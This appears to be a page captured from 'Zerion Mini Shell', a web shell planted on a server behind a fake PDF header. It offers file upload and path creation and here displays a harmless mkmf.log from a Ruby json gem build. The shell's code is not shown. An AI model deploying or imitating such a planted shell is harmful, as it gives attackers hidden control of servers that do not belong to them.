%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/rs/ruby/1.8/lib/ruby/gems/1.8/gems/json-2.2.0/ext/json/ext/parser/
Upload File :
Create Path :
Current File : //home/rs/ruby/1.8/lib/ruby/gems/1.8/gems/json-2.2.0/ext/json/ext/parser/mkmf.log

have_func: checking for rb_enc_raise() in ruby.h... -------------------- no

"cc -o conftest -I. -I/usr/local/ruby/1.8/lib/ruby/1.8/amd64-freebsd11 -I.    -O2 -pipe -I/usr/local/include -fwrapv -fno-strict-aliasing -std=gnu89  -fPIC   conftest.c  -L. -L/usr/local/ruby/1.8/lib -L. -L/usr/local/lib -rdynamic     -lruby-static  -lpthread -lrt -ldl -lcrypt -lm   -lc"
conftest.c:5:53: error: use of undeclared identifier 'rb_enc_raise'
int t() { void ((*volatile p)()); p = (void ((*)()))rb_enc_raise; return 0; }
                                                    ^
1 error generated.
checked program was:
/* begin */
1: #include <ruby.h>
2: 
3: /*top*/
4: int main() { return 0; }
5: int t() { void ((*volatile p)()); p = (void ((*)()))rb_enc_raise; return 0; }
/* end */

"cc -o conftest -I. -I/usr/local/ruby/1.8/lib/ruby/1.8/amd64-freebsd11 -I.    -O2 -pipe -I/usr/local/include -fwrapv -fno-strict-aliasing -std=gnu89  -fPIC   conftest.c  -L. -L/usr/local/ruby/1.8/lib -L. -L/usr/local/lib -rdynamic     -lruby-static  -lpthread -lrt -ldl -lcrypt -lm   -lc"
ld: error: undefined symbol: rb_enc_raise
>>> referenced by conftest.c
>>>               /tmp/conftest-8e2398.o:(t)
>>> did you mean: rb_exc_raise
>>> defined in: /usr/local/ruby/1.8/lib/libruby-static.a
cc: error: linker command failed with exit code 1 (use -v to see invocation)
checked program was:
/* begin */
1: #include <ruby.h>
2: 
3: /*top*/
4: int main() { return 0; }
5: int t() { rb_enc_raise(); return 0; }
/* end */

--------------------


Zerion Mini Shell 1.0